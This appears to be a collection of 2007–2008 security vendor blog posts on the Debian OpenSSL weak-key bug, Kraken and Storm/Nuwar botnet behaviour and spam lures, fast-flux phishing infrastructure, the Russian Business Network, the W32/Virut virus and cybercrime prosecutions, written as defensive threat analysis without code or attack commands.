Almost two years ago in 2006 Debian decided to clean up their OpenSSL implementation. They found a few lines of code that were causing Valgrind and Purify to complain about access to uninitialized memory. Without a major investigation into the purpose of the suspect lines of code they were simply removed. All basic tests continued to pass with the lines of code removed and Purify and Valgrind both stopped complaining about the improper memory access. The change was forgotten and everyone believed that the OpenSSL implementation was working just fine.

For the purposes of all the OpenSSL algorithms there was no deficiency. Encryption and decryption and hashes would be calculated correctly. The problem was that the PRNG used for generating keys by the OpenSSL library had been crippled when those critical lines were removed back in 2006. This was not discovered until just this week when Luciano Bello discovered that without those lines the only ‘random’ data used to seed the PRNG was the PID of the OpenSSL process. On many Linux systems the PID is limited to a positive signed 16 bit value. This means there are only 32,767 possibilities. When new keys and certificates were generated by OpenSSL they relied on this number to provide all of their entropy.

The consequence of this bug is that from September 2006 until May 2008 there were only 32,767 possible keys that could be generated by OpenSSL. Several individuals have generated “black lists” of every possible key that this OpenSSL implementation could generate. According to some reports this entire list can be generated in a couple hours. This weakness affects any key generated by OpenSSL including SSH and DNSSEC keys among others.

Many machines will fail to be updated in a quick manner after the discovery of this vulnerability. There are already many botnets which spread by simply brute forcing common username and password combinations over SSH. It will probably not be long until some of these networks are modified to start attempting RSA authentication using the faulty OpenSSL keys. These attacks will not take long to develop and have the potential to compromise large numbers of machines. It is important for administrators to note that even if they replace and upgrade the OpenSSL package they must recreate and replace any keys or certificates generated by the broken OpenSSL kit.

The moral for developers is to always be sure you understand the impact of your code changes. This goes extra for critical libraries like OpenSSL. Minor and seemingly inconsequential changes can leave major problems festering undetected for years. There may also be some changes in the way that Debian developers work with the developers of other related software packages like OpenSSL. Hopefully increased communication between the development teams in the future can prevent this kind of bug from recurring.

Over the past week, Mailbot.f (a.k.a “Kraken”) was thoroughly studied and reverse engineered by various security researchers. As mentioned in my previous blog, we focused mainly towards the network behavior of the bot and observed a few interesting things.

After the bot installs on a victim machine, it attempts to contact mx.google.com via TCP destination port 25 (SMTP) 3 times. This looks to be a network connectivity test by the bot. If this test fails, the bot does not send out any spam at a later stage. (Note that the bot does not use mx.google.com to spam). Next, the bot downloads the front page of 3 different popular web sites (mostly news sites), such as nytimes.com, cbsnews.com, news.com, cnn.com, reuters.com, msn.com, google.com, etc. We have not observed the use of these web pages in the spam sent out by this bot, however.

The bot then tries to find its peers and communicates with them. If it is an older version of the bot, it uses UDP destination port 447 to communicate with the peers, sending information such as the bot version, outgoing smtp connectivity status and other machine specific information such as hostname, operating system, uptime, language, CPU specs, memory information etc. It also communicates the current modules and their versions. The older version of the bot then downloads an update from its peers by connecting on TCP destination port 447. We have observed that this update is around 100 to 200 kbytes. The bot then updates itself.

The new version of the bot (or updated bot from the previous step) contacts its peers using UDP on random destination ports and sends similar information as in the previous step. It then connects to one of the peers to update its modules using TCP destination port 80. If the peer is available on port 80, the bot communicates using HTTP POST messages and receives the updates from its peers.

In the case when the peer is not available on TCP port 80, the bot communicates on TCP destination port 443 to download the module updates. Though it communicates using TCP port 443, the data is not SSL.

The bot then downloads other modules from its peers, such as spam template, spam payload, and mx server addresses, etc. With this information it starts sending out spam email. After sending out a batch of spam, it downloads further updates and sends out spam again.

We made the above observations after looking at a number of Mailbot.f samples. Most of these samples were either v315 or v316 (as derived from the bot client registration packet). All of the command & control (c&c) communication is encrypted and we were able to decode some of the c&c communication using the wireshark plugin referenced by mnin security blog. Since the bot can be updated, at will by the bot author, some of these observations may/can be changed at any time.

Given that the bot uses

• encrypted data
• random UDP destination ports with random size packet payloads
• legitimate HTTP protocol on TCP destination port 80
• communication on TCP destination port 443

its c&c communication is very stealthy and difficult to detect. Although the bot is currently being used to send spam email, the stealthy c&c communication and the update infrastructure already in-place can pose a greater threat if used for more devastating purposes.

After the recent interest in Kraken bot by various communities, Gaurav Dalal, Denys Ma, and I have been observing the network behavior of the bot very closely.  About 2 weeks after the initial analysis from SANS, it seems like the bot author has seeded the bot with an update via TCP port 447. The updated bot now uses a stealthier command and control (c&c) mechanism that will evade previously proposed detections. The updated bot no longer uses UDP port 447 with 74 bytes of payload. After the bot updated itself, we observed that it uses UDP packets with random ports and also random packet payload lengths for its c&c communication. All of this c&c communication is encrypted. As a surprise, we also noticed that the updated bot now uses the well known HTTP protocol on TCP port 80 and 443 to send and receive encrypted c&c communication data. More interestingly, the communication on port 443 is encrypted but non-SSL. The process of the upgrade and also the c&c mechanism itself seems to be very interesting. We are continuing our research and will update this blog with more technical information soon.

As I was recently asked about botnet figures, I revisited our collections to establish some trends in this area.

In 2004 and 2005, bots were placed in a separate group of their own, separate from viruses and Trojans. Their names often ended with « bot » (W32/Sdbot, W32/Spybot, W32/Gaobot…). Based on the number of separate variants we had in our collections (the zoos) at the time, statistics showed a constant increase.

We have noted since then that a lot of malware has a remote-control feature (i.e. they are bots). Whether we are dealing with worms, viruses or Trojans, they are designed to receive commands and execute them at some point in their life. As of today, much of this remotely-controlled malware are known under various malware family names (W32/Nuwar, W32/Mytob, Spam-Samburg, Srizbi, Backdoor-DIX, etc.). Consequently our counting methods have to change.

On the Internet, various websites allow us to measure a different aspect of the threat.

For example, the Shadowserver Web Site shows us a botnet count. The following graph is a count of all the active Command and Control (C&C) servers the Shadowserver Foundation is aware of. There are approximately 2900 botnets today compared to 1400 one year ago:

Counting the infected computers is a much more arduous task. In January 2007, I reported on Vinton Cerf’s talk at the World Economic Forum in Davos, Switzerland and explained that he estimated 100 or 150 millions machines as infected represented over 10% of the PCs connected to the Internet. At the same time, some sources estimated less than 10 millions machines when others say they identify nearly 250000 new bots, or infected IPs each day.

Various techniques can be used to track zombie machines. I will only quote one to allow me the opportunity to give you some interesting links:

1. Observing DNSBL queries
   Method is exposed in a white paper from the College of Computing, Georgia Institute of Technology. It is based on the insight that botmasters themselves perform DNS-based blackhole list (DNSBL) lookups to determine whether their spamming bots are blacklisted or not. There are techniques and heuristic rules to distinguish botnet DNSBL reconnaissance queries from valid DNSBL traffic performed by legitimate mail servers.
2. Watching IRC traffic
   It is one of the simplest methods of detecting IRC-based botnets. It involves sniffing IRC traffic and searching for any signatures matching known botnet commands.
3. Checking Behavioural Characteristics
   As an example, researcher Stephane Racine demonstrated that IRC bots were idle most of the time on a Chat IRC channel but responded faster than a human upon receiving a command.
4. Searching for malware hashes on P2P networks
   With decentralized Peer-to-Peer botnets, compromised nodes on the network can be identified by their retrieval of hashes known to be associated with botnets. The College of Computing and Informatics University of North Carolina at Charlotte proposed this method for tracking W32/Nuwar (alias Storm) infected machines. To determine which search hashes are pertinent, the bot could either be actively running on a network without a true Internet connection to determine current hashes, or the hash generation algorithm could be extracted from its binary to generate hash sets on the fly based on the limited set of random integers and the current time.
5. Watching attack traffic
   Analysing the traffic linked to massive spam distribution or DDoS attacks can reveal the amount of compromised computers. Since January 2008, the Shadowserver graphs demonstrate a huge increase in this field.

To conclude this post, I have to say that looking at these studies did not help me in calculating how many computers are, at the moment, affected by bots! Extrapolation between 120000 or 150000 items known as active in a botnet at a given moment and a total number is hard to envisage… However, making these searches was not useless. We can certainly predict an increase in DDoS attack will be a 2008 issue and, for sure, more and more botnet will be used in the field ; perhaps 40 or 50% of them.

In “celebration” of tomorrow being April Fool’s Day, the people behind Nuwar a.k.a. Storm have launched a new E-mail spam campaign. An E-mail with a subject and a short body text like “Happy April Fool’s Day!” or similar would have a usual, for Nuwar anyway, all-numeric-IP http link. Following that link brings up a page like this:

If you wait those 5 seconds, it’ll try to download file funny.exe to your computer. If you click on the image, it’s kickme.exe. And if you click on “click here” it’s foolsday.exe. All of them are nothing but a new Nuwar variant.

There was recently an article discussing a talk given by Gene Hodges, on the sociological changes in the virus-writer scene. On the one hand, I think the concept is correct, there has been a very large shift in the sociological motivation behind authoring malware. One of the two conclusions he’s drawn, however, is contrary to facts.

You may recall from the other day’s blog entry that 17 people between the ages of 17 and 26 were arrested in Canada. Earlier that week another person “under the age of 18″ was arrested for botnet-related activity. I don’t imagine that even teenagers who’re making so much money on botnets would be homeowners, as Hodges suggested.

It seems to me that kids are still what make the malware world go round - many seem to feel invincible, as if the law can’t touch them. Or perhaps they just “don’t know better”. These are kids who’ve grown up with technology, so cybercrime may seem as easy as taking candy from a baby. And there is still very little risk for them in these crimes. There’s few prosecutions compared to the total number of individuals perpetrating these crimes, and these kids have no property or reputation to lose. A married adult with a mortgage, like the ones Hodges describes, might be concerned about losing a house which they and a spouse are living in. A teenager, on the other hand, would be highly unlikely to have property in their name which could be confiscated.

In short, the stereotype of the kid in his parent’s basement still holds. But now maybe they can afford some flashy duds to attract the ladies when they’re not holed up in the basement stealing your data.

After a series of holiday related campaigns, Nuwar (a.k.a. Storm) is back to its ecard routine. E-mails promising funny ecards are being spammed all over the Internet. The usual http://numeric-IP/ links inside lead to a page like this:

A click on the picture leads to postcard.exe download, a click on the “click here” - to e-card.exe download. If nothing is clicked, in five seconds ecard.exe download is started automatically. Needless to say, all of the files are Nuwar.

Good news on the botnet-busting front comes to us from Canada! Yesterday 17 people ages 17-26 were arrested on charges stemming from alleged botnet-related activities, which resulted in $45 Million in damages.

Evidently, this is the first time that a hacking network has been dismantled in Canada (and the first time I recall hearing that a female was busted in connection with botnet activities). Over the course of the two years that this network was under investigation, the network took control of up to a million computers. When you figure the number of computers hijacked, the amount of the damages, and the number of people they were able to connect with this crime, this is a very impressive win for the Quebec police.

The maximum sentence for the charges is 10 years in jail - it will be interesting to see how much jail time this could mean for the people who’re found guilty. When the 15-year-old Canadian who called himself “Mafiaboy” was arrested for DDoS attacks against several major websites in 2000, he was sentenced to only 8 months in jail. He was also found to have caused millions of dollars worth of damage in the attacks. The people charged as part of this hacking network may have begun their criminal activities at the same age as Mafiaboy, as the initial investigation into this network goes back to summer of 2006. However, it seems that the trend has been towards longer sentences for people convicted of cybercrime, so it may be that they will not get off as light as Mafiaboy did.

The two primary differences that will figure into the sentencing, as I see it, are that the hacking network did this as a money-making enterprise, and that this was done over a long span of time. Arguably, Mafiaboy’s actions could be explained away as a moment of youthful indiscretion. These people allegedly profited from these crimes over the course of two years.

This makes me wonder how much of the total damage amount they actually took home, versus the cost of cleaning up infected machines, the cost of down-time and lost productivity. I doubt sincerely that these kids’ friends and family wouldn’t have noticed an influx of almost $3 million a piece in such a short span of time.

All in all, this is an impressive step in the direction of making legal action a real deterrent for kids who would consider taking up cybercrime.

With Valentine’s Day coming this week, we have seen a new wave of Nuwar spamming this Monday evening, amounting to more than 20 variants in a couple of hours. Detection for these variants from major AV vendors was near nonexistent, as the Nuwar writer is using a new compiler this time to bypass detection.

When you click on the link in the e-mail, the Web site will display a picture and you will be prompted to download the executable as shown below.

We have seen samples named valentine.exe.
Happy Valentine’s Day!

With Christmas and New Year behind us, it’s not only shops getting ready for Valentine’s Day but Nuwar (a.k.a. Storm) as well. You may receive a Valentine-themed E-mail with subject like “I Dream of you”, “For You….My Love”, “Sending You My Love”, etc. etc. and the body text prompting you to click on a typical Nuwar-style link of http://some.numeric.address . If the link is followed, the user is presented with a page similar to this:

Clicking on the link on that page, or at the image of the heart, will lead to a download of with_love.exe which is, of course, a new variation of Nuwar.

It’s not a secret anymore; criminal organizations behind a large part of Internet-related frauds are huge and well organized. In the last quarter of 2007, two studies about RBN (Russian Business Network), one of the most well known criminal organizations so far, were published. Last year, I looked at them with great interest. The first is named Uncovering Online Fraud Rings: The Russian Business Network and is available as a webcast recording on the Verisign web site. The second was written by David Bizeul and is named Russian Business Network study.

These papers demonstrate and illustrate that RBN is an empire. It directly or indirectly manages potentially a million sites. Thanks to elaborate intrusive advertising techniques, millions of Internet users visit its fake retail sites every month. Hackers and other cybercriminals also have their stores and outlets there: malware sales, service offers and booby-trapped sites. Pornography and pedophilia always make money there.

In addition to these documents, some particularly thorough stories have been circulating on the Net (papers from Brian Krebs, Washington post and posts on the RBNexploit and Dancho Danchev blogs).

Mailing addresses, name and photos of suspects, detailed lists of machines and autonomous systems as well as many other details were revealed. Because of this, the group has deemed it best to partially disappear. On November 6th, 2007, many network nodes stopped responding. It was not the end of them though; the business has been carefully planned: high-activity sites – those leading the attacks at the time – were not disturbed. Gradually, the affected sites began to re-appear in Russia as well as all over the world. Today, many countries in Southeast Asia are mentioned, but they are not alone. The reorganization is on the move: new retail payment systems for fake products (mainly fake security products and fake video codecs), new legitimate sites hosting tricky banner ads redirecting computers to these fake retail web sites, new Storm (aka Nuwar) worm campaigns achieved by new C&C botnet implementations, new web sites hosting malicious software (like MPack or WebAttacker) and secretly reached after the victims encounter a hidden iFrame during Internet surfing.

People tracking down RBN regularly watch its Autonomous Systems (AS). These are collections of connected IP networks controlled by a single entity and defined by an AS number. The RBNexploit blog and the David Bizeul document are very comprehensive on this subject and various network maps or tables help the reader to understand the complexity of such an organization.

One puzzle piece is known as AS40989. Despite the fact it was not the core center of the RBN activity it is well-known because it seems to be the official name of the group. It is the subject of a new write-up available at the Shadowserver Foundation web site.

This document analyzes the malicious binary activity directed to and commanded by AS40989. From March to November 2007 the researchers collected 2859 pieces of malware which initiated HTTP connections to it. They found an impressive collection of malware: “Gozi, Goldun, Hupigon, Nurech, Nuklus, Pinch, Sinowal, Tibs, Xorpix, various dialers, downloaders, worms, adware, page hijackers, and proxies”. Once again, it demonstrates the professionalism and the size of the group.

Reading material on RBN is abundant. With this post, I only wish to draw your attention to this existing material. It demonstrates the vitality of the new criminal organizations, it also demonstrate that many people, at McAfee and elsewhere, stay tuned into the dark side of the Internet to understand how the situation is constantly changing and to fight against this threat at a worldwide level.

Continuing to capitalize on the holiday season theme, Nuwar is up to a new trick.  Or rather a new old e-card trick. You may receive a New Year greeting E-mail like this:

And if you follow the link (don’t) it currently takes you to a no-frills download-and-infect-your-computer-yourself Web page:

Needless to say, your New Year isn’t going to be that happy if you follow the instructions.

With Christmas upon us, the bad guys behind Nuwar (a.k.a. Storm Worm) couldn’t miss the opportunity. Here is an example of an e-mail you may receive:

If you follow the link (please, don’t!), you’ll be greeted like this:

By this time, of course, a not adequately protected computer would already be infected by Nuwar through a mixture of exploits. And if that doesn’t work, Nuwar authors always leave a chance for a gullible user to click on the image and get infected by the downloaded executable.

Once upon a time, a “botnet” was a network of infected computers controlled from a central command and control (C&C) channel. This was a very clear, simple definition.

Cut to early 2007, after the release of Nuwar, a.k.a. the Storm Worm. Suddenly the term botnet had to account for things that were not controlled by a central C&C but managed by a hydra-headed control network. There was no longer a single head to be cut off to kill a botnet; now a network had several heads, which could be replaced as quickly as one was removed. The definition of botnet broadened to describe only the network of infected computers, exclusive of having a central C&C.

Now the term has broadened again, to include any functionality used by a botnet, including things such as password stealing and sending phishing emails or spam. The FBI warns that botnets “threaten online-shopper security,” but it seems to me they’re really warning against an increase in the prevalence and sophistication of Internet crime that is facilitated by botnets.

So I direct this discussion to you, dear reader: Has the definition of botnet become so watered down that it loses any meaning? If so, do we need to find some new term to replace what used to specify a distinct group of malware? Or do we need to broaden our warnings to include all crimeware–including botnets, password stealers, remote-access Trojans, phishing, and spam?

Last Friday, I started some analysis on fast-flux techniques. I stopped my discussion with single-flux so today I will improve on the camouflage!! To do this, the fake site’s IP addresses are varying as well as the IP addresses of the name servers that define them in the DNS architecture. This is double-flux.

Here, the criminal has a genuine control and monitoring workstation. These machines are no longer just for relaying http traffic; they simulate the domain name servers and resend the various IP addresses for the connection which - as before - are valid only for a moment.

When the victim tries to reach the site he would like to visit, a request is sent to the name server with authority over the zone. Just like with single-flux, the short lifespan of the address leads the name server request to the criminal network. First used at this level, the fast-flux technique causes the request to be redirected to a first zombie machine inside the botnet (fast-flux on name servers - IP_A to IP_E). This machine requests the response from the C&C workstation and forwards it to the requestor by using the same method a second time (fast_flux on web site - IP_1 to IP_9).

In return, the IP address of another zombie machine is sent to the victim. This second bot relays the traffic, preserving the criminal’s anonymity.

As the hereafter blurred image suggests, this third example deals with an adult site that tries to remain discreet about its origins. Two dig commands launched a few minutes apart show us the result.

On the web site side, the expiration dates are reduced to 10 minutes (600 seconds), and the site’s IP addresses are very varied (fast-flux on web site). It’s the same for the domain name servers, which changed within a short period of time (fast-flux on name servers).

Combining the three previous methods gives a major headache :-). But as result, we obtain the scheme used in the mysterious RockPhish structures. The ingredients are:

• lots of domain names,
• a fast-flux botnet network in double-flux mode,
• specialized software that is responsible for sending out phishing e-mails, where each recipient is assigned an index. This is used as a parameter in the URL, and again within the mirror site as long as the victim gets connected.

I won’t bore you with the final synoptic for the network traffic. Simply seeing the next URLs collected in the phishing e-mails collection gives you an idea of the complexity of the attack.

The host domain name varies, as do the domain name servers. The control and monitoring workstation manages the structure of the network in real time. Let’s not forget that this is primarily a network of compromised machines (a botnet). The index is there to ensure proper redirection according to victims, banks, machines to be activated, and the group of fraudsters profiting from the attack.

I hope this dissection interested you. It demonstrates that attacks are more and more sophisticated. To be sure, groups like the ones using RockPhish with so much energy to improve their network resilience and stealth are doing so because it is very profitable for them.

For several years, we have been talking about the sophistication of attacks. The main goals are discretion, camouflage and profitability. Some of the common techniques and tools are named Fast-Flux, RockPhish or MPack. As I recently worked on some spam campaigns and dubious websites, I will use them as examples and explain some of these new cybercriminal methods in a set of two blog contributions.

Before complicating the scheme, let me start with a very simple example:

Here, a spammer owns a lot of domain names. He constantly buys new ones using stolen credit card numbers and uses them accordingly with the service interruptions that can occur very quickly or slowly, depending upon the vigilance and honesty of the access providers.

One machine contains his site. It may be dedicated to selling medicine or counterfeit luxury products. In order to trick anti-spam software, e-mails are personalized with background noise and random text. For more diversification, and due to the many domain names he has, his software changes the URL of his site for the various messages it sends.

When a victim tries to follow the link provided for them, a process makes a request to the local name server for the IP address of the machine corresponding to the URL they were sent:

If the information exists at this level (a cache mechanism), it is forwarded directly to the requester. Otherwise, and if the link is still valid, the desired IP address is returned only after checking root and/or primary servers. Dozens of different domain names could point to a single machine.

Here is an example of a result that could be obtained using this method:

With phishing, the methods are becoming more complex. This curve issued from APGW statistics does not highlight the number of victims, which has increased a lot this year.

It shows that, since mid-2006, the total number of incidents (with and without a victim) has remained stable. What’s interesting are the peaks in November 2006 and particularly in April 2007. The question is: how can we have three times more phishing sites than identified attacks? The answer is called RockPhish.

To understand it better, we will expand upon the previous example and look at the intermediate single-flux and double-flux methods.

In single-flux, the criminal has just one domain. Thanks to an unscrupulous access provider, he manages his own domain name server. The criminal also has a network of compromised machines available to him, which he uses as a platform to relay between the victims and his site. The use of very short DNS expiry dates linked to a round-robin technique involving many zombie machine IP addresses allows it to continually change a fictitious physical address used to reach the mirror site.

The latter is therefore even better protected.

When the victim tries to reach the mirror site, a request is sent to the name server with authority over the zone.

The lifespan of the address being no more than a few minutes, there is generally no cached solution. The criminal’s name server is therefore checked. The IP address of one of the bots is sent back to the victim. During the several minutes of the transaction, it will relay the traffic and then disappear, making it more difficult to locate and therefore neutralize key sites.

Here is an example of an online casino site using single-flux technique:

My Windows dig (Domain Information Groper) version shows some distinctive network features: the expiration dates here are very short, and the IP addresses are very varied. This is the mark of a camouflage using the single-flux technique.

Next post will allow us to see how work a double-flux and, after that a RockPhish network.

It seems to be about that time to, once again, get out our computer security crystal ball and conjecture about the upcoming year.

Many things are changing. Some are staying the same. In some areas we are in uncharted territory.

Threats are moving quickly to technologies such as VoIP and instant messaging. Virtualization will have a huge impact on both data security and the data security industry itself. Professional and organized criminals continue to drive much of the malicious activity. The complete set of predictions is available for download on McAfee’s Threat Center as well as a bonus episode of our podcast AudioParasitics.

A few security researchers are branching out into a new subject matter that is sometimes called “Passive Host Characterization” (PHC). I had the good fortune to work on one of these projects so I thought I would share a bit of that experience.

PHC is much like a passive IDS system – the two are distinct, but a passive IDS is the closest relative to PHC. The basic idea is to deploy sensors around your network to passively monitor traffic. Rather than looking for signatures, you’re going to focus on rules that collect data from the observed traffic. For example, you might grab browser User-Agent strings or OpenSSH Server strings. Additionally, it’s quite common to employ a network based OS identification system, such as P0f. The basic concept is very simple. Collect OS info, server strings, client strings, DNS info, or other simple data and data mine it. From an engineering perspective, the situation is quite difficult as you must back-haul, process, and store the data, but the fundamental task you’re performing is relatively simple.

There are two such applications that I’m aware of. The first is the TRICKLER project by the NSA. The software is unclassified, open, and available from their technology exchange office. The second is Tenable’s Passive Vulnerability System (PVS). Both have their own pros and cons, but for this post I’m only interested in the technology.

Now, what can you gain from such technology? From my experience, the answer is as varied as your imagination. Here are some examples:

1. Policy Auditing – when you know what’s on your network you can see what shouldn’t be there. Client strings, such as for XBOX 360 showing up on your corporate network or a random telnet server can easily point to problems.
2. Patch Management – inventorying IT is a nightmare. I’ve never seen an organization that hasn’t had a box (or VM) that they couldn’t find. With PHC, if the box talks on the network (ie if it’s a risk) then you can find it and know about it.
3. Penetration Testing – if you have PHC information available for a pen test, the game is almost already over. While passive OS identification is weak and client/server strings are changed, they’re usually not and combined together you have a great idea of what the network looks like. Banner grabbing is a first step in a pen test. To instantly have so much information lets you pick and choose the right targets and create very little noise. Caution though, this is a double edge sword. Good guys and bad guys alike can use this information.
4. Data Exfiltration Detection – one of the cooler data exfiltration techniques is misusing DNS. PHC can characterize typical DNS traffic (by volume, message size, whatever you choose). If you see frequent large DNS messages you might have a problem. This isn’t a theoretical attack, vendors have products that do this.

I’ve seen the 4 above examples used very effectively at very large organizations. But again, the uses aren’t limited to the above. I’ve conjectured about tracking down the Storm botnet. I’m NOT a Storm expert, but it appears that Storm uses the so called “fast-flux” techniques. Essentially, it uses DNS changes and proxies to rapidly change where A-Names point to. This enables the proxy to use a domain name, but to move from IP to IP very quickly. PHC as mentioned above, can characterize DNS traffic. Simply write a rule that detects DNS names with many expired A-Records or DNS replies with extremely short TTL values. Very quickly, you’ll likely start to see hosts that are in a fast-flux botnet…. From there, maybe you can characterize those hosts?

Most of the virus researchers in Avert spend their days analyzing samples coming in from customers. With a good percentage of the samples coming in every day being unknown, there’s plenty to keep us busy, 24/7/365. But what is it like, sorting through an unending stream of samples every day? What does that entail?

It’s a bit like trying to identify a life-form from a disconnected body part. Sometimes the body part is actually the whole animal, but it’s often just a toenail or a feather. There are times where we don’t even get a body part, but a footprint or a piece of the animal’s droppings.

Sometimes we’ll get lucky and it’s an animal whose footprint we know really well, or which has very distinctive feathers. Then we can say “there’s a good chance what you have is a peacock”, based on just that feather. But more often than not, people are dealing with something entirely new or rare. Perhaps this critter only displays its distinctive traits in very specific circumstances.

Of course, our favorite sort of sample is one which is a complete body with a good explanation of where and how the animal was found. Whereas a foot accompanied by no information may get an answer of “This is an amphibian”, more of the animal or more context can increase the odds of us being able to say something more specific: “This is Litoria caerulea - aka the Dumpy Tree Frog. It lives in Australia and it is often found hiding in downspouts.”

So how does someone wishing to submit something for analysis go about doing it?

For starters, include as much info as you can: What version of security product are you using? In the case of our products, what version of the product, what engine and DAT files are you using? Are you seeing detection with some AV product? What filename and virus name was given? Are you seeing strange behavior that you associate with the file?

Getting the whole beast can be a bit more tricky. There’s sort of a continuum of sneakiness, from very spammy looking emails with attachments, to bots which get in through software vulnerabilities and then drop rootkits. If you’re the “lucky” recipient of the easy variety, ZIP up that email and send it to us.)

If your sample falls somewhere on the sneakier side of the spectrum, files can really be scattered all over a machine, and some of them are particularly good at hiding. You may want to try scanning your system with the Rootkit Detective or the Beta DATs from the Avert Tools page. This can help identify more suspicious files.

Maybe you’re pretty astute and you’ve noticed that after you ran a file a strange file, it created hundreds of randomly named files in your Windows directory. We may or may not need more than one of those files. You’ll want to check for duplicates, to make sure. If you know how to generate hashes for a file, just make sure you have one of each unique hash, up to about 10. (If you have something parasitic or polymorphic this will give us a decent representation) If you’re not sure how to create a hash, there are certain programs which can help you. One of my favorites is the CRC option in WinZIP (in Configurations, under the Options menu). This allows you to group by CRC and get rid of any duplicates.

In short, try not to just send a blurry video of Sasquatch (or is that a guy in a gorilla suit?) or to send us a hundred disembodied ant legs. The more thorough and complete the sample, the better the chances of getting a complete picture of what’s plaguing your machine.

We all know that Nuwar aka Storm gang has been continuously changing their spam email text, download sites, executables, network traffic patterns etc in their efforts to penetrate through the security defenses at various layers, all throughout this year. I had a chance to briefly look at a ‘fresh’ Nuwar sample this weekend. It is interesting that they have now also changed the names of files Nuwar drops. It now drops noskrnl.exe, noskrnl.sys and noskrnl.config instead of Spooldr.exe, Spooldr.sys, and Spooldr.ini correspondingly. It also tried to actively propagate by coping itself on the floppy drive, which is new.

It is not the first time that the names of dropped files have been changed (it used to be wincom earlier this year) but it did not change in the past few months. Users, especially those who use system diagnostic tools, should exercise caution in distinguishing noskrnl from the legitimate ntoskrnl.exe. Perhaps spooldr had become too well known for author’s comfort, search results for spooldr clearly indicate what it is but not for noskrnl for the time being. Anyways, we detect these as Tibs-Packed.

There have been quite a number of fascinating articles lately pertaining to the people behind the scenes in the world of malware: the folks who offer malware-related services.

First we have the Washington Post article from a few days ago, discussing the Russian Business Network, which is thought to be hosting a significant number of sites involved in distributing malware, phishing, child pornography, and other undesirable things. The RBN responded to these allegations in an interview with Wired magazine, saying that they’re innocent of these charges.

CIO magazine has also posted a three-part article about researchers’ experiences with tracking and infiltrating a group that is renting password-stealing botnets. Again, we see that name again: the Russian Business Network.
Part 1, Part 2, Part 3

The amount of cooperation in these circles astounds me. Forget Kevin Bacon; it’s like the Six Degrees of Bot Masters out there!

There’s a small point that’s made on page 1 of Part 3 of the CIO article that I think bears further examination: In the very near future, customers will be forced to deal with more of the consequences if their machines are found to be insecure. It could be banks lowering fraud limits or making infected customers prove that they were sufficiently protected against malware.  It could be ISPs limiting infected machines to walled gardens. I’m sure this trend will continue, as service providers get tired of eating the cost of malware-related damages.

There are those who say that this tactic is punishing victims, and to a certain extent I agree with this assessment. On the other hand, each of us is a victim in this situation, and each one of us is being punished regardless of whether our machine is ever infected. The money that banks and ISPs are paying to deal with cybercrime has to come from somewhere. That money comes from higher ISP rates or bank fees. It’s my hope that the problem gets sorted out like a use tax, or car insurance rates. Those who keep their machines clean can have the best rate, while those who get infected see their rates rise until they kept their systems clean for some time.

Hopefully there can be a way to make people aware of the cost of identity theft without leaving them in the poorhouse, one that helps them appreciate the importance of protecting their machines.

The latest trick Nuwar (aka Storm) plays looks like this:

Like previous variants, the HTML page contains a script that attempts to execute the malicious file hosted on the webserver. However even if this exploit code gets blocked by AV software or not executed at all because of security settings in the browser - the user still has the option to click on the download button and infect their machine.

Make sure you’re protected so you do not join the Storm network!

In this age of botnets, rootkits, spyware and other bleeding edge security threats, file infectors are frequently thought of as a dead threat. But over the past year or so, we have seen a resurgence in classic file infecting viruses. Parasitic threats such as W32/Bacalid, W32/Detnat and W32/Polip have enjoyed a relatively high degree of success in the wild causing widespread damage to computer systems.

An upcoming new kid on the block is W32/Virut - a polymorphic entry-point obscuring virus with IRC bot functionality. Once a machine is infected, it hooks the following APIs (ZwCreateFile, ZwCreateProcess, ZwCreateProcessEx, ZwOpenFile) in ntdll.dll for all running processes, in an attempt to infect .EXE and .SCR files. It then “phones home” to a remote IRC command and control server where it can be instructed to download other malware or be used to perform DDoS attacks.

W32/Virut comes with its share of buggy code and as a result it may misinfect or reinfect a significant proportion of executable files leaving them permanently corrupted beyond repair. Some variants make the trivial mistake of not checking PE section boundaries while infecting and this causes infected executables to crash when run. Also, the virus sometimes hijacks its own function calls which leads to an infinite loop. No one ever said viruses had the best programming

The creator of W32/Virut appear to have a fancy for the works of Friedrich Nietzsche - a nineteenth century German philosopher. Embedded in the virus body is an excerpt from a poem by Nietzsche.

O noon of life! O time to celebrate!
O summer garden!
Relentlessly happy and expectant, standing: -
Watching all day and night, for friends I wait:
Where are you, friends? Come! It is time! It’s late!

Virus code is usually known to contain personal taunts directed towards the antivirus community or flames against rival malware authors. But quoting Friedrich Nietzsche - that’s deep! (Credits to Naveen Gooty for analysis but Dave Marcus still doubts the translation used in the virus code!!).

They say bad news comes in threes, and it would seem virus writers are the ones getting the bad news right now.

In the last month we’ve seen arrests and a conviction related to two malware families, Downloader-AAP and W32/Fujacks. Now there’s been an arrest and indictment of an alleged botmaster, related to the DDoS attack on CastleCops. Certainly not such smooth sailing for malware authors these days!

On the other hand, it does seem that cybercrime is still pretty lucrative, as long as you don’t mind being incarcerated or monitored by government agencies for a while. The Fujacks author apparently has a very lucrative job waiting for him when he finishes his sentence, and three men who were recently fined by the FTC for surreptitiously distributing adware, will apparently be keeping $3.2 million in profits from their underhanded activities.

While we haven’t won the war against malware authors by a long shot, it certainly seems that a few big battles have been won recently. Hopefully this trend will continue, and being a malware author will become more and more risky and less lucrative.

After luring unsuspecting users into its trap with Labor Day postcards and NFL kickoffs, Nuwar (a.k.a. Storm Worm) has now switched to “free games” bait:

or

 If you’re gullible enough to follow that link, it will take you to a convincingly enough looking Web page loaded with games images and an unpleasant surprise–a cocktail of exploits and downloaders:

So if you’re not running an on-access anti-virus product, you’re already in trouble. Anyway, the page itself looks like this (complete with broken images):

It promises “1000+ free games,” but whatever icon you click you get nothing but Nuwar in a file named ArcadeWorld.exe.

There are two trends which seem to be heading for an inevitable conflict.

• increasing use of virtualization in the market place
• increasing detection of debuggers and virtual environments by malcode

Virtualization, while once relatively small is expanding in the market, driven by cost cutting measures, affordability, and disaster recovery to name just a few.  Large players (VmWare, IBM, Microsoft, and others) are offering competing platforms to serve the customer need.  Public information and general interest lead one to believe in a moderate rate of adoption.

On the other hand malware often times is encapsulated with Anti-VM technologies (e.g. Themida), or uses code to detect the virtual environment (e.g. Nuwar) and then exits the application.  This has been a generally increasing in an attempt to irritate security researchers who find virtual machines a convenient way to analyse malware quickly.

VM technologies present their own security hurdles in the future, but in the short term these trends probably make Virtual machines more secure (at least from a malware perspective) than physical ones.  These trends will eventually force malware authors to make a decision.  Write code to make it harder for security researchers to analyse, or expand platform support to virtual environments.

While monitoring the Nuwar/Zhelatin/Storm network, I noticed the bot stoped sending out emails on Thursday at 9.45pm UTC.

No more postcards? No more Pump&Dump spam? Or just a bug in my setup?

